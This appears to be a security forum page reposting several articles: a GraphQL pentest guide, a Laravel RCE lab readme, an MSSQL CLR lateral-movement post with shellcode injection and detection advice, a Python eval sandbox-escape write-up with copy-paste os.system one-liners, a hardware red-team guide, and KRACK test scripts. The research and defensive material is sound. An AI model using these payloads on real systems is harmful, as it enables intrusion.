investments, for example, 50 thousand, we can send a request that will be processed by the server for a very long time or will “drop” it altogether. Instead of processing valid requests, the server will be busy unpacking the giant nesting of the request-dummy. In addition to large nesting, requests themselves can be "heavy" – this is when a single request has a lot of fields and internal investments. Such a request may also cause difficulties in processing on the server. Conclusion   So, we have reviewed the basic principles of penetration testing applications with GraphQL. We hope you have learned something new and useful for yourself. If you are interested in this topic, and you want to study it more deeply, then we recommend the following resources: www.howtographql.com is the main resource for learning from scratch. In addition to theory, it contains practice. www.graphql.com is also a good site to learn this technology. www.howtographql.com/advanced/4-security – GraphQL security. AppSecCali 2019 – An Attacker's View of Serverless and GraphQL Apps is a good video with concrete examples.   And don't forget: practice makes perfect. Good luck!   Sursa: https://prog.world/pentest-applications-with-graphql/
    • CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar.readonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里) 复现效果 脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。 通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。 参考资源 https://www.ambionics.io/blog/laravel-debug-rce https://xz.aliyun.com/t/9030#toc-3 https://blog.csdn.net/csdn_Pade/article/details/112974809   Sursa: https://github.com/SNCKER/CVE-2021-3129
    • MSSQL Lateral Movement  David Cash  Tool Release  January 21, 2021 5 Minutes Using discovered credentials to move laterally in an environment is a common goal for the NCC Group FSAS team. The ability to quickly and reliably use a newly gained set of credentials is essential during time-constrained operations. This blog post explains how to automate lateral movement via MSSQL CLR without touching disk* or requiring XP_CMDSHELL and how this can be prevented and detected. *A DLL is still temporarily written to disk by the SQL Server process. Post exploitation of MSSQL services to achieve command execution commonly leverages the XP_CMDSHELL stored procedure to run operating system commands in the context of the MSSQL process. To run custom code using this technique, the use of LOLBINS, the addition of a new operating system user or a binary written to disk via BCP is usually required, which provide obvious detection opportunities. The tool developed for this post (Squeak) can be found at: https://github.com/nccgroup/nccfsas/tree/main/Tools/Squeak Leveraging CLR integration for command execution has been previously discussed in this presentation by Sensepost, but has been automated to improve the speed and reliability of the technique. SQL Server CLR Integration The ability to run .NET code from MSSQL was introduced in SQL Server 2005, with various protections overlayed in subsequent versions to limit what the code could access. A permission level is assigned to an assembly upon creation – for example: CREATE ASSEMBLY SQLCLRTest FROM 'C:\MyDBApp\SQLCLRTest.dll' WITH PERMISSION_SET = SAFE; The three options for a permission set are: SAFE: This essentially only exposes the MSSQL data set to the code, with the majority of other operations forbidden EXTERNAL_ACCESS: This opens up the potential to access certain resources on the underlying server but shouldn’t permit direct code execution UNSAFE: Any code is permitted. Detailed Microsoft documentation for SQL CLR is available at https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration. Code which satisfies the requirements to be marked as ‘SAFE’ can be run by simply enabling CLR but several configuration changes, as well as DBA privileges are required to run ‘EXTERNAL_ACCESS’ or ‘UNSAFE’ code. The initial steps required to run an ‘UNSAFE’ CLR differ for server versions before and after 2017, examples of both can be seen below: Prior to SQL Server 2017 Show advanced options: sp_configure 'show advanced options',1;RECONFIGURE Enable CLR: sp_configure 'clr enabled',1;RECONFIGURE; Configure the database in which the assembly will be stored to be trustworthy. ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY ON; Interestingly, the MSDB database appears to be granted TRUSTWORTHY permission by default, which may negate this requirement: SQL Server 2017 and later For SQL Server 2017 and above, strict security was introduced, which must also be disabled. Alternatively there is an option to specifically grant UNSAFE permission to an individual assembly based on the provision of it’s SHA512 hash, rather than marking a whole database as trusted. For SQL Server 2017 and above, the process would be as follows. Show advanced options: sp_configure 'show advanced options',1;RECONFIGURE Enable CLR: sp_configure 'clr enabled',1;RECONFIGURE; Add the SHA512 hash of the assembly to the list of trusted assemblies: sp_add_trusted_assembly @hash= <SHA512 of DLL>; From this point, the creation and invocation of the assembly is the same for any SQL Server version: Create the assembly from a hex string – the ability to create the assembly from a hex string means that it is not necessary to create a binary file and write it to a location accessible by the SQL server process: CREATE ASSEMBLY clrassem from <HEX STRING> WITH PERMISSION_SET = UNSAFE; Create a stored procedure to run code from the assembly: CREATE PROCEDURE debugrun AS EXTERNAL NAME clrassem.StoredProcedures.runner; Run the stored procedure: debugrun After the code has run, the stored procedure and assembly can be dropped, trusted hashes removed and any modified security settings can be returned to normal. An example of SQL queries to achieve this are shown below, although it should be noted that this doesn’t take account of what the initial configuration of the security settings were: For SQL Server 2017 and above: sp_drop_trusted_assembly @hash=<SHA512 of DLL> Prior to SQL Server 2017: ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY OFF; All versions: DROP PROCEDURE debugrun; DROP ASSEMBLY clrassem; sp_configure 'clr strict security',1;RECONFIGURE sp_configure 'show advanced options',0;RECONFIGURE At this point, the SQL Server process is executing any .NET code supplied to it so leveraging this for lateral movement simply requires the construction of an appropriate DLL. As a proof of concept, a simple assembly that XORs some shellcode and injects it into a spawned process was produced. To simplify the creation and invocation of CLR code, GUI application was made that performs the following actions: Collects connection string data Reads in the shellcode bytes from a raw binary file and single byte XORs Generates a MSSQL CLR DLL that XORs the shellcode, spawns a new process and injects the shellcode into it. Calculates the SHA512 hash of the DLL Produces a single .NET executable with hard coded arguments to execute the DLL via an SQL connection – the executable performs the following actions: Creates an SQL connection Checks SQL Server version Check for DBA permissions Checks and records existing security settings Modifies security settings Creates and runs the assembly Restores security settings and deletes the assembly The following screenshots show the process of generating a standalone executable with the connection string and CLR assembly embedded. The code for the CLR assembly is loaded from a file in the working directory, which can either be opened directly or edited from within the tool. Sample code is provided with the tool but has not been optimised for avoiding detection. The generated executable can then be run against the target without any arguments: C:\Users\user\Desktop>latmovemssqloutput.exe Running with settings: ========== Server: Port: 55286 Database: msdb User: dave ========== Connection Open ! Microsoft SQL Server 2012 - 11.0.2100.60 (Intel X86) Feb 10 2012 19:13:17 Copyright (c) Microsoft Corporation Express Edition on Windows NT 6.2 <X64> (Build 9200: ) (WOW64) (Hypervisor) Checking for DBA Privs ┌─┐ │1│ └─┘ Got DBA Privs! Checking whether Advanced Options are already on. │show advanced options│ 0│ 1│ 0│ 0│ Enabling advanced options SQL Server is lower than 2017. Checking CLR status ┌───────────────────────────────────────────────────────────┐ │clr enabled│ 0│ 1│ 1│ 1│ └───────────────────────────────────────────────────────────┘ CLR already enabled Dropping any existing assemblies and procedures SQL version is lower than 2017, checking whether trustworthy is enabled on the connected DB: ┌────┐ │True│ └────┘ Creating the assembly Creating the stored procedure Running the stored procedure. Sleeping before cleanup for: 5 Cleanup ======= Dropping procedure and assembly Disabling advanced options again Cleaned up... all done. The desired shellcode is run, in this instance establishing a Meterpreter session, although obviously any shellcode could be run: Code has been tested against the following SQL Server versions: Microsoft SQL Server 2019 (RTM) – 15.0.2000.5 (X64) Microsoft SQL Server 2017 (RTM) – 14.0.1000.169 (X64)  Microsoft SQL Server 2012 – 11.0.2100.60 (Intel X86) Detection and Response Minimising the exposure of database credentials and applying appropriate privilege management to SQL logins should mitigate against using the protocol to execute code on the underlying operating system. Failing this, there are several opportunities for detection of lateral movement using this technique: Anomalous SQL Server logins Auditing of suspicious transactions such as ‘CREATE ASSEMBLY’, or indeed any other part of the chain of SQL queries required. Actions performed by the DLL itself. In this instance, for example a CreateRemoteThread call from within .NET may trigger a detection The process of invoking an assembly via SQL commands also results in several identical files with different names being written to the temporary directory of the SQL service account. The following screenshot of Procmon shows the file being created and the .NET code being written to it. By adjusting file permissions to prevent files being deleted from the C:\Windows\Temp\ directory, it was possible to retrieve a copy of the file before it was deleted by the sqlservr.exe process. This could then be decompiled to reveal the original code: This gives an additional opportunity for static detection of malicious content, although the evidence is quickly removed after the assembly has executed.   Sursa: https://research.nccgroup.com/2021/01/21/mssql-lateral-movement/
    • Breaking Python 3 eval protections   📅 Jan 16, 2021 · ☕ 7 min read Today I’m presenting you some research I’ve done recently into the Python 3 eval protections. It’s been covered before, but it surprised me to find that most of the info I could find was only applicable for earlier versions of Python and no longer work, or suggested solutions would not work from an attacker perspective inside of eval since you need to express it as a single statement. Since these break every so often, I’ve gone to some length to describe how I arrived at my conclusions to hopefully proverbially ‘teach you how to fish’ so you can work out your own technique should any of the exact solutions I arrived at break in the future. I have also included a copy-and-paste section at the end of this if you’re in a hurry. Background You can skip to the next section if you’re pretty familiar with the inner and outer workings of eval already. In Python, the built-in command eval will dynamically execute any single statement provided to it as a string (exec is the same but supports multiple statements). It takes the following syntax: Of particular interest are the globals and locals parameters, because their purpose is to control which global variables and local variables the evaluated expression has access to. This is important because in Python, all built-in functions like print, __import__ (can be used to import dangerous modules), enumerate, and even eval itself are provided through a global variable called __builtins__. When you type a function as-is, this is where it checks if it is defined before it fails. This is easy to verify by checking for something which does not exist either as a function or variable like, say ,‘potato’. Noting that it gives an error message, then assigning a potato function to the __builtins__ module and calling it and noting that it works. As a way to make eval slightly safer, the idea is that you can clear this __builtins__ variable to prevent dangerous built-in functions from being launched. The typical (mis)use-case here from the perspective of a developer is if you need to evaluate a mathematical expression like 2+2/5*8 without writing a complicated parser, simply using eval('2+2/5*8') is seen as an easy solution since it does the job. So thinking that it would be safe, they choose to code it as eval(input,{'__builtins__':{}},{}), thinking that this means that an attacker-controlled input variable would not be able to cause much harm since it can’t use any of the built-in dangerous functions. This doubly so because eval does not allow you to run multiple statements at once. For example, running eval("1+1;1+1") and eval("1+1\n1+1") will both result in a syntax error and the eval will crash since it’s technically two statements. The failure mode You can recover all the built-in globals, even given none to begin with. You can also do this as a single (though convoluted) statement that will work within eval. In Python, almost everything is an object, by which we mean it inherits from a base class called ‘object’. This including modules, variables, variable types themselves, and functions. In Python, it is possible to traverse these inheritances vertically in both directions with special attributes like __class__, __base__ (up) and __subclasses__() (down). Because it is also possible to declare the variable types implicitly like list() = [], dict() = {}, str() = "" it is by extension possible to without access to any globals or locals declare variables whose inheritance stems from the ‘object’ class, then explore the space upwards to the object class, then downward through the subclasses downwards to find either the full uncleared built-ins themselves or modules that can be used to import further code (because modules also inherit from the object class). It’s the latter method that I’ll be sharing here. Finding the builtins Feel free to play with Python as you read this, but to give you an idea of the amount of subclasses that exist for ‘object’, here’s what my terminal dumps out when I run [].__class__.__base__.__subclasses__(): It’s a lot. There’s without a doubt multiple ways to go from this point just going by the sheer amount of juicy classes, but a simple way that I discovered of proceeding is to grab the ‘BuiltinImporter’ class from the list of subclasses, then instantiate it, import whatever module you want and have fun. Less words, more code: 1 2 3 4 # Trying to do anything up here would fail since the builtins are cleared. for some_class in [].__class__.__base__.__subclasses__(): if some_class.__name__ == 'BuiltinImporter': some_class().load_module('os').system('echo pwned') The problem with the above is that it won’t run if you place it in an eval because it’s multiple statements. It would work just fine in an exec statement, but let’s keep going down this rabbit hole. Turning it into a single statement Your single biggest ally when converting Python code to a single statement is the list comprehension because they are your closest single-statement equivalent when you need a for or while loop. Roughly speaking, the following code: 1 2 3 4 keep_these = [] for x in y: if CONDITION: keep_these.append(x) can be expressed as: 1 [x in y if CONDITION] This is handy because if you’re looking for one exact element in an interable like how we’re looking for BuiltinImporter in the object subclasses you can do this: 1 [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0] To find that class lickety-split. This works because BuiltinImporter will always be in that subclasses list, and when the comprehension is done the only element of the list will be the found element. It’s worth noting that there’s no equivalent of the ‘break’ statement in list comprehensions, so it’s not technically the most efficient for loop for the purpose since it doesn’t stop when the element is found, but … eh, close enough. All we have to do then is instantiate it, call the load_module function and presto we’ve got a one-liner. 1 [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system("echo pwned") Tadaaa! Put this in any eval and watch the sparks fly. You can also call exec as a function under the ‘builtins’ module like [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins').exec('INSERT CODE HERE',{'__builtins__':[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins')}) to run arbitrary code without worry. Just looking at the one-liner gives me a headache, but basically you just want to assign the correct value to the builtins global for the exec function by using the globals parameter the same way a developer would have to use it to clear it. For some reason it does not work to assign to __builtins__ directly before you call normal functions inside of exec (like __builtins__= ... ; do_stuff_here) which seems like a bug, but we’re doing things to poor Python it was never meant to endure so let’s cut it some slack. Copy-and-paste for the impatient I don’t judge since we all got places to be and things to do but consider reading up on the methodology I used to arrive at this code up above. The exact one-liner seems to break every so often between Python versions, but the technique is solid and you should be able to find your own variants on your own if you grasp how I arrived at these. Single statement to bypass the cleared __builtins__ global and arbitrarily run os.system calls: 1 [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system("echo pwned") If you are really desperate to get exec to work (in case you need to launch a multi-line payload), you can do: 1 [x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins').exec('INSERT CODE HERE',{'__builtins__':[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins')}) But don’t bill me for the aspirin you’ll need from reading the one-liner.   Sursa: https://netsec.expert/posts/breaking-python3-eval-protections/
    • A Red Team Guide for a Hardware Penetration Test Part 2: Using security risks from the Modern Open Web Application Security Project to help hack hardware   Adam Toscher 1 day ago·4 min read     This blog serves as a guide to helping demystify some of the bugs and issues discovered during hardware assessments. I’ve shared some of the lessons learned from years of applied logic, and reason to find problems that do not exist. This blog maps loosely some OWASP web application risks to hardware vulnerabilities, from a red team perspective. Some may find the guide below more useful, for IOT based controls, and not generalized hardware assessments. OWASP Internet of Things Project Oxford defines the Internet of Things as: "A proposed development of the Internet in which everyday objects have… wiki.owasp.org   I cover some other general ways to assess IOT devices , in my previous article: A Red Team Guide for a Hardware Penetration Test: Part 1 When looking at different routing and networking technology it’s easy to be overwhelmed, with how to assess an embedded… medium.com   By using the hash of another user, one could use that stored hash as a substitute for an admin’s password. After retrieving the admin hash, the user has “root” access to the device. The vendor‘s response to the customers - addressing the stored hash vulnerability Broken Access Control Summary: OWASP Top 10 Web Application Security Control: Broken Access Control Red Team Technique: Leveraged: The Red team technique used was Pass the hash. The P-T-H technique is covered in my article below. Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) Yes it’s still easy to get Domain Admin “before lunch” as it was when I first started. medium.com   Any user could use the stored hash of an admin user — similar to the Windows attack. This thought pattern came from my days of a penetration testing Windows, since passing the hash is a common technique used, but not usually during the assessment of networking gear. By changing parameters passed to a cli program, you can often use diagnostic utilities; ifconfig, ping, or tcpdump to interact outside your jailed or sandboxed environment. Injection Summary: OWASP Top 10 Web Application Security Control: Injection Red Team Technique: Leveraged: The Red team technique used was the same as any other assessor — lateral thinking. By fuzzing parameters it was possible to abuse diagnostic utilities, like ifconfig and tcpdump and “inject” commands to interact with the underlying operating system. Forced Browsing’s Impact can range from informational to severe depending on it’s use Forced Browsing Summary: OWASP Top 10 Web Application Security Control: Injection Red Team Technique: Leveraged: The Red team technique used was the same as any other assessor; attempt to leverage a known weakness, to access sensitive information. Security Misconfigurations This is the most commonly seen issue, across all devices and assets alike. This is commonly a result of insecure, or default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion. From the most basic misconfiguration to the most elaborate, they’re out there — bugs and major vulnerabilities residing on “secure” hardware platforms Many “security” devices don’t follow best security practices. TL;DR Sometimes you may not need to decap a chip; all you need is a keyboard, a monitor, and direct access to the underlying hardware.   Sursa: https://adam-toscher.medium.com/a-red-team-guide-for-a-hardware-penetration-test-9debc5e9e211
    • This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper. Remember that our scripts are not attack scripts! You will need the appropriate network credentials in order to test if an access point or client is affected by the KRACK attack. 21 January 2021: the scripts have been made compatible with Python3 and has been updated to better support newer Linux distributions. If you want to revert to the old version, execute git fetch --tags && git checkout v1 after cloning the repository (and switch back to the latest version using git checkout research). Prerequisites Our scripts were tested on Kali Linux. To install the required dependencies on Kali, execute: sudo apt update sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils virtualenv Then disable hardware encryption: cd krackattack sudo ./disable-hwcrypto.sh Note that if needed you can later re-enable hardware encryption using the script sudo ./reenable-hwcrypto.sh. It's recommended to reboot after disabling hardware encryption. We tested our scripts with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N v1 on Kali Linux. Now compile our modified hostapd instance: cd krackattack ./build.sh Finally, to assure you're using compatible python libraries, create a virtualenv with the dependencies listed in krackattack/requirements.txt: cd krackattack ./pysetup.sh Before every usage Every time before you use the scripts you must disable Wi-Fi in your network manager. Then execute: sudo rfkill unblock wifi cd krackattack sudo su source venv/bin/activate After doing this you can executing the scripts multiple times as long as you don't close the terminal. Testing Clients First modify hostapd/hostapd.conf and edit the line interface= to specify the Wi-Fi interface that will be used to execute the tests. Note that for all tests, once the script is running, you must let the device being tested connect to the SSID testnetwork using the password abcdefgh. You can change settings of the AP by modifying hostapd/hostapd.conf. In all tests the client must use DHCP to get an IP after connecting to the Wi-Fi network. This is because some tests only start after the client has requested an IP using DHCP! You should now run the following tests located in the krackattacks/ directory: ./krack-test-client.py --replay-broadcast. This tests whether the client acceps replayed broadcast frames. If the client accepts replayed broadcast frames, this must be patched first. If you do not patch the client, our script will not be able to determine if the group key is being reinstalled (because then the script will always say the group key is being reinstalled). ./krack-test-client.py --group --gtkinit. This tests whether the client installs the group key in the group key handshake with the given receive sequence counter (RSC). See section 6.4 of our [follow-up research paper(https://papers.mathyvanhoef.com/ccs2018.pdf)] for the details behind this vulnerability. ./krack-test-client.py --group. This tests whether the client reinstalls the group key in the group key handshake. In other words, it tests if the client is vulnerable to CVE-2017-13080. The script tests for reinstallations of the group key by sending broadcast ARP requests to the client using an already used (replayed) packet number (here packet number = nonce = IV). Note that if the client always accepts replayed broadcast frames (see --replay-broadcast), this test might incorrectly conclude the group key is being reinstalled. ./krack-test-client.py. This tests for key reinstallations in the 4-way handshake by repeatedly sending encrypted message 3's to the client. In other words, this tests for CVE-2017-13077 (the vulnerability with the highest impact) and for CVE-2017-13078 . The script monitors traffic sent by the client to see if the pairwise key is being reinstalled. Note that this effectively performs two tests: whether the pairwise key is reinstalled, and whether the group key is reinstalled. Make sure the client requests an IP using DHCP for the group key reinstallation test to start. To assure the client is sending enough unicast frames, you can optionally ping the AP: ping ./krack-test-client.py --tptk. Identical to test 4, except that a forged message 1 is injected before sending the encrypted message 3. This variant of the test is important because some clients (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise key reinstallations in the 4-way handshake when a forged message 1 is injected before sending a retransmitted message 3. ./krack-test-client.py --tptk-rand. Same as the above test, except that the forged message 1 contains a random ANonce. ./krack-test-client.py --gtkinit. This tests whether the client installs the group key in the 4-way handshake with the given receive sequence counter (RSC). The script will continously execute new 4-way handshakes to test this. Unfortunately, this test can be rather unreliable, because any missed handshake messages cause synchronization issues, making the test unreliable. You should only execute this test in environments with little background noise, and execute it several times. Some additional remarks: The most important test is ./krack-test-client, which tests for ordinary key reinstallations in the 4-way handshake. Perform these tests in a room with little interference. A high amount of packet loss will make this script less reliable! Optionally you can manually inspect network traffic to confirm the output of the script (some Wi-Fi NICs may interfere with our scripts): Use an extra Wi-Fi NIC in monitor mode to conform that our script (the AP) sends out frames using the proper packet numbers (IVs). In particular, check whether replayed broadcast frames indeed are sent using an already used packet number (IV). Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls by monitoring the IVs of frames sent by the client. Capture traffic on the client to see if the replayed broadcast ARP requests are accepted or not. If the client can use multiple Wi-Fi radios/NICs, perform the test using several Wi-Fi NICs. You can add the --debug parameter for more debugging output. All unrecognized parameters are passed on to hostapd, so you can include something like -dd -K to make hostapd output all debug info. Correspondence to Wi-Fi Alliance tests The Wi-Fi Alliance created a custom vulnerability detection tool based on our scripts. At the time of writing, this tool is only accessible to Wi-Fi Alliance members. Their tools supports several different tests, and these tests correspond to the functionality in our script as follows: 4.1.1 (Plaintext retransmission of EAPOL Message 3). We currently do not support this test. This test is not necessary anyway. Make sure the device being tested passes test 4.1.3, and then it will also pass this test. 4.1.2 (Immediate retransmission of EAPOL M3 in plaintext). We currently do not suppor this test. Again, make sure the device being tested passes test 4.1.3, and then it will also pass this test. 4.1.3 (Immediate retransmission of encrypted EAPOL M3 during pairwise rekey handshake). This corresponds to ./krack-test-client.py, except that encrypted EAPOL M3 are sent periodically instead of immediately. 4.1.5 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, same ANonce). Execute this test using ./krack-test-client.py --tptk. 4.1.6 (PTK reinstallation in 4-way handshake when STA uses Temporal PTK construction, random ANonce). Execute this test using ./krack-test-client.py --tptk-rand. 4.2.1 (Group key handshake vulnerability test on STA). Execue this test using ./krack-test-client.py --group. 4.3.1 (Reinstallation of GTK and IGTK on STA supporting WNM sleep mode). We currently do not support this test (and neither does the Wi-Fi Alliance actually!). Testing Access Points: Detecting a vulnerable FT Handshake (802.11r) Create a wpa_supplicant configuration file that can be used to connect to the network. A basic example is: ctrl_interface=/var/run/wpa_supplicant network={ ssid="testnet" key_mgmt=FT-PSK psk="password" } Note the use of "FT-PSK". Save it as network.conf or similar. For more info see wpa_supplicant.conf. Try to connect to the network using your platform's wpa_supplicant. This will likely require a command such as: sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf If this fails, either the AP does not support FT, or you provided the wrong network configuration options in step 1. Note that if the AP does not support FT, it is not affected by this vulnerability. Use this script as a wrapper over the previous wpa_supplicant command: sudo ./krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c network.conf This will execute the wpa_supplicant command using the provided parameters, and will add a virtual monitor interface that will perform attack tests. Use wpa_cli to roam to a different AP of the same network. For example: sudo wpa_cli -i wlan0 > status bssid=c4:e9:84:db:fb:7b ssid=testnet ... > scan_results bssid / frequency / signal level / flags / ssid c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet ... > roam c4:e9:84:1d:a5:bc ... In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see status command). The scan_results command shows this network also has a second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP. Generate traffic between the AP and client. For example: sudo arping -I wlan0 Now look at the output of ./krack-ft-test.py to see if the AP is vulnerable. First it should say "Detected FT reassociation frame". Then it will start replaying this frame to try the attack. The script shows which IVs (= packet numbers) the AP is using when sending data frames. Message IV reuse detected (IV=X, seq=Y). AP is vulnerable! means we confirmed it's vulnerable. Be sure to manually check network traces as well, to confirm this script is replaying the reassociation request properly, and to manually confirm whether there is IV (= packet number) reuse or not. Example output of vulnerable AP: [15:59:24] Replaying Reassociation Request [15:59:25] AP transmitted data using IV=1 (seq=0) [15:59:25] Replaying Reassociation Request [15:59:26] AP transmitted data using IV=1 (seq=0) [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable! Example output of patched AP (note that IVs are never reused): [16:00:49] Replaying Reassociation Request [16:00:49] AP transmitted data using IV=1 (seq=0) [16:00:50] AP transmitted data using IV=2 (seq=1) [16:00:50] Replaying Reassociation Request [16:00:51] AP transmitted data using IV=3 (seq=2) [16:00:51] Replaying Reassociation Request [16:00:52] AP transmitted data using IV=4 (seq=3) Extra: Hardware Decryption To confirm that hardware decryption is disable, execute systool -vm ath9k_htc or similar after plugging in your Wi-Fi NIC to confirm the nohwcript/swcrypto/hwcrypto parameter has been set. Note that you must replace ath9k_htc with the kernel module for your wireless network card. Extra: 5 GHz not supported There's no official support for testing devices in the 5 GHz band. If you nevertheless want to use the tool on 5 GHz channels, the network card being used must allow the injection of frames in the 5 GHz channel. Unfortunately, this is not always possible due to regulatory constraints. To see on which channels you can inject frames you can execute iw list and look under Frequencies for channels that are not marked as disabled, no IR, or radar detection. Note that these conditions may depend on your network card, the current configured country, and the AP you are connected to. For more information see, for example, the Arch Linux documentation. Note that the Linux kernel may not allow the injection of frames even though it is allowed to send normal frames. This is because in the function ieee80211_monitor_start_xmit the kernel refuses to inject frames when cfg80211_reg_can_beacon returns false. As a result, Linux may refuse to inject frames even though this is actually allowed. Making cfg80211_reg_can_beacon return true under the correct (or all) conditions prevents this bug. So you'll have to patch the Linux drivers so that cfg80211_reg_can_beacon always returns true, for instance, by manually patching the packport driver code. Extra: Manual Tests It's also possible to manually perform (more detailed) tests by cloning the hostap git repository: git clone git://w1.fi/srv/git/hostap.git And following the instructions in tests/cipher-and-key-mgmt-testing.txt.   Sursa: https://github.com/vanhoefm/krackattacks-scripts
  • Create New...